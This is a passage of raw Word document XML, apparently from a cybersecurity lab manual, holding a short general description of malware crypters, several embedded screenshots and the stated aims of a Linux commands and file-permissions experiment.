                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003A4D3C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Crypters</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003A4D3C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> work by encrypting the malicious code and embedding it in a harmless file such as an image or document. When the victim opens the file, the encrypted code is decrypted and executed, allowing the attacker to gain control of the victim's computer. </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003A4D3C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Crypters</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003A4D3C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> can be purchased on the dark web or developed by attackers themselves.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7BF68465" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="001138A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B420EF4" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="001138A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70446EA5" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="001138A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C559F23" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="001138A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BC6CA78" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="001138A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="245245BF" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="001138A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="034A764D" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="001138A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AA90724" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="001138A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2183DF80" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="001138A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B21FFCC" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="001138A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="425F2E32" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="001138A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="587BFC05" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="001138A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27802D13" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="001138A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B4E02E6" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="001138A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AD218F4" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="001138A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="113CCCC8" w14:textId="484CA672" w:rsidR="004307F9" w:rsidRDefault="004307F9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D83EED6" w14:textId="1E9690C6" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="001138A0">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696E4BC6" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="001138A0">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69FCA988" w14:textId="77777777" w:rsidR="0031540E" w:rsidRDefault="0031540E" w:rsidP="0031540E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C766A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D22B81C" wp14:editId="557D368F">
            <wp:extent cx="5090160" cy="3138932"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="17366963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637" name="Picture 1" descr="Graphical user interface&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId125"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5114599" cy="3154003"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F518EF" w14:textId="3FA2F779" w:rsidR="0031540E" w:rsidRDefault="0031540E" w:rsidP="0031540E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B50B7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="522118C3" wp14:editId="0429FB19">
            <wp:extent cx="5114730" cy="3855720"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19469943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4317" name="Picture 1" descr="Graphical user interface, text, application&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId126"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5123803" cy="3862559"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CA625D" w14:textId="77777777" w:rsidR="0031540E" w:rsidRDefault="0031540E" w:rsidP="0031540E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="202C65F3" w14:textId="1F7CB6EF" w:rsidR="0031540E" w:rsidRDefault="0031540E" w:rsidP="0031540E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00693BD6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0ABE07AA" wp14:editId="3738AA26">
            <wp:extent cx="5235517" cy="3998794"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1905"/>
            <wp:docPr id="19019574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7468" name="Picture 1" descr="Graphical user interface, text, application, email&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId127"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5238595" cy="4001145"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A9C6D4" w14:textId="77777777" w:rsidR="0031540E" w:rsidRDefault="0031540E" w:rsidP="0031540E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="624FDEC9" w14:textId="77777777" w:rsidR="0031540E" w:rsidRDefault="0031540E" w:rsidP="0031540E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00693BD6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13E43FC9" wp14:editId="366FBC8A">
            <wp:extent cx="5943600" cy="1346835"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="17232078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7854" name="Picture 1" descr="Graphical user interface, text, application&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId128"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1346835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="475DE86F" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="001138A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C40E69F" w14:textId="102E67CC" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00A90352">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F50AE8F" w14:textId="35459FA8" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00A90352">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B0AC599" w14:textId="774B690D" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00A90352">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="230A1C33" w14:textId="55E88966" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00A90352">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54EBE2B9" w14:textId="7865B6C9" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00A90352">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C567F74" w14:textId="78FB97EF" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="00BE1412" w:rsidP="001138A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">EXPERIMENT NO. </w:t>
      </w:r>
      <w:r w:rsidR="002C63F7" w:rsidRPr="001C411D">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47F15" w:rsidRPr="001C411D" w14:paraId="4834E15D" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55646038"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220C2D5C"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137F081E" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06CC206F"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05EA95BC"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1EABA357" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6004FEDD"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10CCDF9F"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10AA8AB9" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="323AB124" w14:textId="676CF099"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D47F15" w:rsidRPr="001C411D" w14:paraId="6AB18098" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59571923"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08BD8C06"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3246C8BB" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D6C41B5"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4A8D857C"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bl>
    <w:p w14:paraId="608F69E0" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="001138A0">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138A0" w:rsidRPr="001C411D" w14:paraId="3DB09B6C" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78DD9C33"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68BE4AF5"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p w14:paraId="674E91B6" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="60"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>To familiarize the students with the concept of Linux to extract information</w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C38E4DC" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="60"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001138A0" w:rsidRPr="001C411D" w14:paraId="61E112F9" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="3B474D5C"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396F9512" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="08B6946E" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0"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learn commands of Linux required for exploitation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F68FEF9" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00CF046C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Student will be able to change permissions of the Files and Folders</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A0A8D71"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56449ABA" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12A1BC04"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61B6ABF5" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00DE6919">
